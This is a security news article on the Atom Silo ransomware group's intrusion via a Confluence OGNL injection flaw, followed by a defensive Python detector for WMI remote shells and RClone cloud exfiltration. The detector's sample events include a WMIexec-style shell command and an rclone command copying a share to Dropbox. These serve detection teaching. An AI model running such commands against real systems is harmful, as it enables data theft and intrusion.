Atom Silo exploits a recent Confluence vulnerability to deploy ransomware

A recently emerged ransomware group called Atom Silo has been exploiting a newly disclosed RCE flaw in Atlassian’s Confluence collaboration software to deploy its ransomware payloads.

The vulnerability, which Atlassian patched last month, is tracked as CVE-2021-26084 and allows a remote attacker to execute arbitrary code via Object-Graph Navigation Language (OGNL) injection.

The discovery was made by Sophos’ MTR Rapid Response team while investigating a recent ransomware attack involving Atom Silo. While the ransomware is very similar to the LockFile ransomware, the threat actor used several novel techniques, including the side-loading of malicious dynamic-link libraries designed to disrupt endpoint protection software.

The attack itself was performed in two stages. The intrusion stage took place on September 13, 11 days prior to the ransomware attack. To gain initial access to the target system, the threat actors exploited CVE-2021-26084 in a Confluence server to create a backdoor, which in turn allowed them to deploy a second backdoor.

The payload dropped for the second backdoor consisted of three files, one of which was a legitimate, signed executable from a third-party software provider that is vulnerable to an unsigned DLL sideload attack.

“The DLL’s main role is decrypting and loading the backdoor from the third file, mfc.ini. The loaded code then connects to one of several stored hostnames (in this case, update.ajaxrenew[.]com) over TCP/IP port 80. The code appears similar to that of a Cobalt Strike Beacon. Once loaded, the backdoor allowed for remote execution of Windows shell commands through the Windows Management Interface (WMI), in the style of SecureAuth Corp.’s WMIexec penetration testing tool,” Sophos explained.

Within five hours after dropping the DLL, the attackers compromised additional servers and used a compromised administrative account to copy and execute the backdoor binaries using WMI.

Three days later, the threat actor collected data from the security logs, checking for user logons and logoffs, account lockouts, the assignment of special privileges to a logon, and the use of sensitive privileges, and also gathered information about the local network.

The attackers then used the RClone utility to copy data off the server to a Dropbox account from several directories and connected to the domain controller and dropped their all-in-one attack executable. This executable performed a search for all the domain controllers on a network and created a batch file, which executed the kernel driver to disrupt endpoint protection, and then launched the ransomware.
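A defender-side illustration of two behaviours described above, shell commands launched remotely through WMI (children of the WMI provider host, as WMIexec-style execution produces) and RClone copying data to a cloud remote. This is an added example, not code from the Sophos report; the process-creation records are constructed and the Sysmon-style field names are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style; field names assumed)."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample events; not real telemetry from the incident.
SAMPLE_EVENTS = [
    # Shell spawned by the WMI provider host: the pattern left by remote WMI execution.
    ProcEvent("SRV01", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1631540000.12 2>&1'),
    # RClone copying a share to a Dropbox remote.
    ProcEvent("SRV02", r"C:\Windows\explorer.exe", r"C:\Tools\rclone.exe",
              r'rclone.exe copy "D:\Shares\Finance" dropbox:backup --transfers 32'),
    # Benign: an interactive shell started by the user's desktop session.
    ProcEvent("WS07", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c dir"),
]

SHELLS = {"cmd.exe", "powershell.exe"}
# Remote names a hunter might flag; extend to match the cloud storage in use locally.
CLOUD_REMOTES = re.compile(r"\b(dropbox|mega|gdrive|onedrive|s3)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event: ProcEvent) -> list:
    """Return the list of detection names that fire on a single event."""
    findings = []
    if basename(event.parent_image) == "wmiprvse.exe" and basename(event.image) in SHELLS:
        findings.append("wmi_remote_shell")
    if basename(event.image) == "rclone.exe" and CLOUD_REMOTES.search(event.command_line):
        findings.append("rclone_cloud_exfil")
    return findings


def scan(events: list) -> dict:
    """Map each host with at least one finding to its list of findings."""
    hits = {}
    for e in events:
        f = detect(e)
        if f:
            hits[e.host] = f
    return hits
```

Running `scan(SAMPLE_EVENTS)` flags SRV01 and SRV02 and leaves the benign WS07 shell alone; the same two checks can be run over exported Sysmon or EDR process telemetry.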

“The incident investigated by Sophos shows how quickly the ransomware landscape can evolve. This ultra-stealthy adversary was unknown until a few weeks ago,” the researchers noted.

“While similar to another recently discovered ransomware group, LockFile, Atom Silo has emerged with its own bag of novel and sophisticated tactics, techniques and procedures that were full of twists and turns and challenging to spot – probably intentionally so.”

“In addition, Atom Silo made significant efforts to evade detection prior to launching the ransomware, which included well-worn techniques used in new ways. Other than the backdoors themselves, the attackers used only native Windows tools and resources to move within the network until they deployed the ransomware.”